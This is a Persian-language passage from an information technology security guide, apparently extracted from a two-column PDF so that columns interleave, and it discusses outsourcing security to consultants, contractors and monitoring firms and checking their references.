‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﺷﻤﺎ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺑﺎﻻﻳﻲ ﺩﺭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺷﺮﻛﺘﻲ ﺗﺄﺳﻴﺲ ﻛﻨﻴﺪ ﻭ ﺗﻮﺍﻧﺎﺋﻴﻬﺎﻱ ﺧﻮﺩ‬
‫ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺴﺎﻧﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﻗﺒﻴﻞ ﺷﺮﻛﺘﻬﺎ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎﻱ ﺷـﻐﻠﻲ ﻣﻬﻤـﻲ ﭘﻴـﺪﺍ ﻣـﻲﺷـﻮﺩ؛‬ ‫ﻓﺼﻞ ﻫﻔﺘﻢ‬
‫‪١٠٠‬‬
‫ﭼﺮﺍﻛﻪ ﺩﺭ ﺳﻄﺢ ﺩﻧﻴﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺘﺨﺼﺺ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬ ‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴﺖ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻧـﺪ ﺟﻮﺍﺑﮕـﻮﻱ ﺗﻤـﺎﻣﻲ ﻧﻴﺎﺯﻫـﺎﻱ ﺻـﻨﺎﻳﻊ ﻭ‬
‫ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﺎﺷﺪ‪ .١٠١‬ﻟﺬﺍ ﺩﺭ ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ‬ ‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻏﺮﺏ‪ ،‬ﻳﻚ ﺍﻧﻔﺠﺎﺭ ﺩﺭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺧـﺪﻣﺎﺕ‬
‫ﻣـﺸﺎﻭﺭﺍﻥ ﻭ ﻣﻨــﺎﺑﻊ ﺧـﺎﺭﺟﻲ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑـﻪ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﺑــﺎ‬ ‫ﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﺮﻭﻧﻲ ﺑـﺮﺍﻱ ﻣـﺪﻳﺮﺍﻥ ﺑﻨﮕﺎﻫﻬـﺎﻱ ﺍﻗﺘـﺼﺎﺩ ﹺ‬
‫ﺍﻧﺪﺍﺯﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺑﺮﺍﻱ‬ ‫ﻋﻤﻮﻣﻲ‪ ،‬ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﺗﻮﺍﻧﻤﻨﺪﻱ ﻭﺍﻛـﻨﺶ‬
‫ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﺧـﺪﻣﺎﺕ ﻗﺎﺑـﻞ ﻭﺍﮔـﺬﺍﺭﻱ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺍﺯ‬ ‫ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺑﻪ ﺗﻬﺪﻳـﺪﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻫـﺴﺘﻨﺪ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺒﻲ‬
‫ﺳﺎﺯﻣﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ ﺩﺭﺟـﻪﻳـﻚ ﻭ‬ ‫ﺍﺳﺖ‪ ،‬ﻭﻟﻲ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ ﺑﺎﻳـﺪ ﺑـﻪ‬
‫ﻣﻤﺘﺎﺯ ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺮﺧﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻛـﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺗﺨـﺼﺺ ﺑـﺎﻻﻳﻲ‬ ‫ﺩﻗﺖ ﺻﻮﺭﺕ ﮔﻴﺮﺩ ﻭ ﻛﺎﺭﺁﻳﻲ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﻛﻨﺘﺮﻝ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ ،‬ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺿﻌﻴﻒ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ‬ ‫ﺷﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺧﻲ ﺍﺯ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺐ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻭﺿﻌﻴﺖ ﺍﻳﻦ ﺷﺎﺧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺑـﺎ ﻳـﻚ ﻧﮕـﺎﻩ‬ ‫ﺫﻛﺮ ﺷﺪﻩ ﻭ ﻳﻚ ﺩﺳـﺘﻪ ﺳـﺆﺍﻻﺕ ﻛـﻪ ﭘـﻴﺶ ﺍﺯ ﻧﻬـﺎﻳﻲ ﻛـﺮﺩﻥ‬
‫ﺿﻌﻒ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺗـﺎﺯﻩﻛـﺎﺭ ﺗﻬﻴـﻪ ﺷـﺪﻩﺍﻧـﺪ ﺭﺍ‬ ‫ﻣﺬﺍﻛﺮﺍﺕ ﺑﺎ ﺷﺮﻛﺎﻱ ﺟﺪﻳﺪ ﺑﺨﺶ ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳـﺦ ﺩﺍﺩ‬
‫ﺗﺸﺨﻴﺺ ﺩﺍﺩ‪.‬‬ ‫ﻧﻴﺰ ﻋﻨﻮﺍﻥ ﺷﺪﻩﺍﻧﺪ‪.‬‬

‫ﺍﮔﺮ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑﺨـﺸﻲ ﻣﺨـﺼﻮﺹ ﺗﻬﻴـﺔ‬ ‫ﺑﺮﻭﻧﺴﭙﺎﺭﻱ؛ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺮﺍﻱ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻫﻨﻮﺯ ﻧﺘﻮﺍﻧﺴﺘﻪﺍﻳﺪ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎﻱ‬
‫ﻭﺭﻭﺩ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻋﺮﺻﻪﻫﺎﻱ ﺟﺪﻳﺪ‬
‫ﺗﺮﻣﻴﻢ ﺍﺯ ﺳﻮﺍﻧﺢ ﻭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺗـﺪﻭﻳﻦ ﻛﻨﻴـﺪ‪،‬‬
‫ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺧـﺎﺭﺝ ﺳـﺎﺯﻣﺎﻧﻲ‬ ‫ﺑﻌﺪ ﺍﺯ ﻣﻄﺎﻟﻌﺔ ﻫﻤﺔ ﻣﻄﺎﻟـﺐ ﻓـﺼﻠﻬﺎﻱ ﮔﺬﺷـﺘﻪ ﺷـﺎﻳﺪ ﺑـﻪ ﺍﻳـﻦ‬
‫ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ‪ .‬ﭼﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﻪ‬ ‫ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎ ﺩﺭ ﻭﺿـﻌﻴﺖ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﺧﻮﺑﻲ ﻫﺴﺘﻨﺪ؛ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﻨﻮﺯ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ‬
‫ﺍﻃﻼﻋﺎﺕ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﭼﻨـﻴﻦ ﺗﺨﺼـﺼﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ‬ ‫ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؛ ﻳﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺣﺠﻢ ﻛﻞ ﻛـﺎﺭ ﺗﺮﺳـﻴﺪﻩ ﺑﺎﺷـﻴﺪ‪.‬‬
‫ﺑﺎﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻛﻮﺗـﺎﻩﻣـﺪﺕ ﻭ ﻫـﻢ ﺑـﺮﺍﻱ‬ ‫ﺍﮔﺮ ﺟﺰﺀ ﺩﺳﺘﻪ ﺁﺧﺮ ﻫﺴﺘﻴﺪ ﺍﻳﻦ ﺗﺼﻮﺭ ﺭﺍ ﻧﻜﻨﻴﺪ ﻛﻪ ﺍﻧﺠـﺎﻡﺷـﺪﻥ‬
‫ﭘﻲﺭﻳﺰﻱ ﺗﻮﺍﻧﻤﻨﺪﻳﻬﺎﻱ ﺑﻠﻨﺪﻣﺪﺕﺗﺮ )ﺁﻣﻮﺯﺵ ﻭ ﻛﺴﺐ ﺁﮔﺎﻫﻲ( ﺑـﺴﻴﺎﺭ‬ ‫ﺁﻥ ﻓﻌﺎﻟﻴﺖ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥﻧﺎﭘـﺬﻳﺮ ﺍﺳـﺖ‪ .‬ﺭﺍﻫﻬـﺎﻱ‬
‫ﺍﺭﺯﺷﻤﻨﺪ ﺑﺎﺷﺪ‪.‬‬ ‫ﺩﻳﮕﺮﻱ ﻫﻢ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻃﺮﺣﻬﺎ ﻭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺩﺭ‬
‫ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ‪ ،‬ﻣﺸﺎﻭﺭﺍﻥ ﻭ ﭘﻴﻤﺎﻧﻜـﺎﺭﺍﻥ‬
‫ﺗﺪﻭﻳﻦ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ‬ ‫ﺧﺎﺭﺝ ﺍﺯ ﺷﺮﻛﺖ‪ .‬ﺣﺘﻲ ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﺗﺠﺎﺭﺕ ﺍﻧﻔـﺮﺍﺩﻱ ﻛﻮﭼـﻚ‬
‫ﺍﻭﻟﻴﻦ ﻗﺪﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﭼـﻪ ﺧـﺪﻣﺎﺗﻲ‬ ‫ﺩﺭ ﻣﻨﺰﻝ ﻳﺎ ﺷﺮﻛﺘﻲ ﻛﻮﭼﻚ ﻛﻪ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬ ‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻣﻨﺎﻓﻊ ﺗﻘﺴﻴﻢ ﺗﺠـﺎﺭﺏ‬
‫ﺗﺨﺼﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ :‬ﻋﻘﺪ ﻗـﺮﺍﺭﺩﺍﺩ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ ﮔـﺮﻭﻩ ﺁﻣـﻮﺯﺵﺩﻳـﺪﻩ ﻭ‬
‫‪ ۱۰۱‬ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﻛﻤﺒﻮﺩ ﻣﺘﺨﺼﺺ ﺁﻣﻮﺯﺵﺩﻳﺪﺓ ﺍﻣﻨﻴﺖ‪ ،‬ﻛﻤﺒﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ‬ ‫ﺑﺎﺗﺠﺮﺑﻪ ﻛﻪ ﺑﻪ ﻫﻴﭻ ﺍﺩﺍﺭﻩﺍﻱ ﻭﺍﺑﺴﺘﻪ ﻧﻴﺴﺘﻨﺪ ﺭﺍ ﺍﺳﺘﺨﺪﺍﻡ ﻛﻨﻨـﺪ ﻭ‬
‫ﻣﻨﺎﺑﻊ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺗﺤـﺼﻴﻼﺕ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﺮﺍﻛـﺰ ﺁﻣﻮﺯﺷـﻲ ﻭ‬
‫ﺗﻮﺍﻧﺎﻳﻴﻬﺎﻳــﺸﺎﻥ ﺭﺍ ﺑــﺎ ﻣــﺸﺘﺮﻳﺎﻥ ﻣﺘﻘﺎﺿــﻲ ﺗﻘــﺴﻴﻢ ﻧﻤﺎﻳﻨــﺪ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺍﺳﺖ‪ .‬ﺩﻭﻟﺘﻬﺎ ﻭ ﺻﻨﺎﻳﻊ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﺍﺯ‬
‫ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺗﺨﺼﻴﺺ ﻣﻨﺎﺑﻌﻲ ﺑـﺮﺍﻱ ﻛﻤـﻚ‬
‫ﺑﻪ ﺳﺎﺧﺘﻪﺷﺪﻥ ﺍﻳﻦ ﺣﻮﺯﻩ ﺑﻪ ﺷﺪﺕ ﺷﻜﺴﺖ ﺧﻮﺭﺩﻩﺍﻧﺪ‪.‬‬ ‫‪ ۱۰۰‬ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣﻨﻴﺖ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ )‪(Outsourcing‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٦٨‬‬

‫ﻛﺮﺩﻩﺍﻧـﺪ‪ ،‬ﻳـﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ ﺩﺭ ﻣﻘـﺎﻻﺕ ﺧﺒـﺮﻱ ﺍﺯ ﺁﻧﻬـﺎ ﻣﻄـﺎﻟﺒﻲ‬ ‫ﺁﻳــﺎ ﺑﺨــﺶ ﺍﻣﻨﻴــﺖ ﺭﺍ ﺑﻌﻨــﻮﺍﻥ ﺑﺨــﺸﻲ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﺧــﻮﺩ ﻭ ﺑــﺎ‬
‫ﺧﻮﺍﻧﺪﻩﺍﻧﺪ‪ ،‬ﻭ ﻳﺎ ﭘﺲ ﺍﺯ ﻳﻚ ﺗﻤﺎﺱ ﺳﺎﺩﺓ ﺗﻠﻔﻨﻲ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ‬ ‫ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﻛﻨﻴﺪ؟‬
‫ﻭﺍﺳﻄﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺧﺪﻣﺎﺕ ﺁﻧﺎﻥ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬ ‫ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﻓﻘﻂ ﺑﻪ ﻣﺸﺎﻭﺭﺍﻧﻲ ﻧﻴﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ‬
‫ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺛﺎﻟﺚ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺟﺎﻳﮕـﺎﻫﻲ ﻗـﺮﺍﺭ‬ ‫ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻓﺮﺍﻣﻮﺵ ﻧﺸﺪﻥ ﻳﻚ ﻣـﺴﺌﻠﻪ ﻣﻬـﻢ‪ ،‬ﻋﻤﻠﻴـﺎﺕ‬
‫ﺩﺍﺭﺩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﺳـﻨﮕﻴﻨﻲ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﻭﺍﺭﺩ‬ ‫ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ‪.‬‬
‫ﺁﻭﺭﺩ‪ .‬ﺣﺘﻲ ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻴﺮﻭﻧﻲ ﺑﺴﻴﺎﺭ ﺍﻣﺎﻧﺘﺪﺍﺭ‬ ‫ﺷﺎﻳﺪ ﺧﻮﺩﺗﺎﻥ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭﻟﻲ ﻧﮕﺮﺍﻥ‬
‫ﻭ ﺷﺎﻳﺴﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺩﺭ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ‬ ‫ﺯﻣﺎﻥ ﻛﻢ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺑﺤﺮﺍﻥ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻛﻨﻴﺪ ﻭ ﺁﻥ ﻛﺎﺭ ﺑﺼﻮﺭﺕ ﻧﺎﻣﻄﻠﻮﺏ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗـﺎ‬
‫ﻣﺎﻫﻬﺎ ﺑﻌﺪ ﻛﻪ ﭘﻴﺎﻣـﺪﻫﺎﻱ ﺁﻥ ﺁﺷـﻜﺎﺭ ﺷـﻮﻧﺪ ‪ -‬ﺯﻣﺎﻧﻴﻜـﻪ ﺷـﺎﻳﺪ‬ ‫ﻱ ﻳﻚ ﺷﺮﻛﺖ ﺑﻪ ﺑﺎﺯﺍﺭ ﺑﺮﻭﻳـﺪ‬ ‫ﭘﺲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﺟﻠﺐ ﻫﻤﻜﺎﺭ ﹺ‬
‫ﺭﺍﺑﻄﺔ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺷﺮﻛﺖ ﭘﺎﻳﺎﻥ ﻳﺎﻓﺘﻪ ﺑﺎﺷﺪ ‪ -‬ﻣﺘﻮﺟﻪ ﺁﻥ ﺍﺷـﻜﺎﻝ‬ ‫ﺗﺎ ﭼﻨﺪ ﭘﻴﻤﺎﻧﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ )ﺗﻤﺎﻡ ﻭﻗﺖ ﻭ ﻳﺎ ﭘـﺎﺭﻩ ﻭﻗـﺖ( ﺑـﻪ‬
‫ﻧﺸﻮﻳﺪ‪.‬‬ ‫ﺍﺩﺍﺭﺓ ﺷﻤﺎ ﺑﻔﺮﺳﺘﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴـﺪ ﺍﺯ ﺧـﺪﻣﺎﺕ‬
‫ﺷﺮﻛﺘﻬﺎﻱ ﻧﻈﺎﺭﺕ ﻭ ﻭﺍﻛﻨﺶ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ١٠٢‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺗﻨﻬـﺎ‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﻗﺘﻲ ﻳﻚ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ ﻫﻤﻜـﺎﺭﻱ ﺩﺭﻧﻈـﺮ‬ ‫ﺑﺮ ﺍﻣﻨﻴﺖ ﺷﻤﺎ ﻧﻈﺎﺭﺕ ﻛﻨﻨﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﺑﺮﻭﺯ ﺍﺷـﻜﺎﻝ ﺑـﻪ ﺷـﻤﺎ‬
‫ﻣﻲﮔﻴﺮﻳﺪ ﺑﺎﻳﺪ‪:‬‬ ‫ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻣﻌﺮﻓﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬ ‫ﺷﺎﻳﺪ ﻧﺘﻮﺍﻧﻴﺪ ﻳﻚ ﻛﺎﺭﻣﻨﺪ ﺗﻤﺎﻡ ﻭﻗﺖ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ ﻳـﺎ ﻧﻴـﺎﺯﻱ ﺑـﻪ‬
‫ﺑﺪﻧﺒﺎﻝ ﻣﻌﺮﻓﻬﺎﻱ ﺣﺮﻓﻪﺍﻱ ﺑﮕﺮﺩﻳﺪ ﻛﻪ ﺷـﺨﺺ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻲ ﺭﺍ‬ ‫ﭼﻨﻴﻦ ﻛﺴﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻋﻘـﺪ‬
‫ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺸﺎﺑﻪ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺪﻧﺒﺎﻝ ﺁﻥ ﻫـﺴﺘﻴﺪ‬ ‫ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﻳﻚ ﺷﺮﻛﺖ ﻣـﺸﺎﻭﺭﻩ ﻭ ﻧﻈـﺎﺭﺕ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ‬
‫ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺧﺪﻣﺎﺕ ﻛﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻧﻴﺎﺯﺗﺎﻥ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻛﻨﺪ ﻭ ﻧﻴﺰ ﻣﻘﺮﻭﻥ‬
‫ﺑﻪ ﺻﺮﻓﻪﺗﺮ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻓﺮﺍﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬
‫ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻣﻮﺍﺭﺩ ﻓـﻮﻕ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺪﺍﻧﻴـﺪ‬
‫ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﺧﺎﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﺗﺎﻥ ﺑﻪ ﺷﻤﺎ ﻣﻌﺮﻓﻲ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺑـﺎ‬
‫ﻧﻴﺎﺯﻫﺎﻳﺘﺎﻥ ﭼﻴﺴﺖ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺁﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﻛﺪﺍﻡ ﻧﻴﺎﺯﻫﺎﻳﺘـﺎﻥ‬
‫ﺭﻭﺷﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤﻴﻦ ﻣﺒﺤﺚ ﻭ ﺩﺭ ﺑﺨﺶ "ﺍﻓـﺮﺍﺩ" ﺷـﺮﺡ‬
‫ﭘﺎﺳﺦ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻫﻤﻴـﺸﻪ ﺳـﺎﺩﻩ ﻧﻴـﺴﺖ‪ ،‬ﭼﺮﺍﻛـﻪ ﺗـﺎ‬
‫ﻣﻲ ﺩﻫﻴﻢ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ ﻛﻨﻴـﺪ‪ .‬ﺩﺭ ﻣـﻮﺭﺩ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ‬
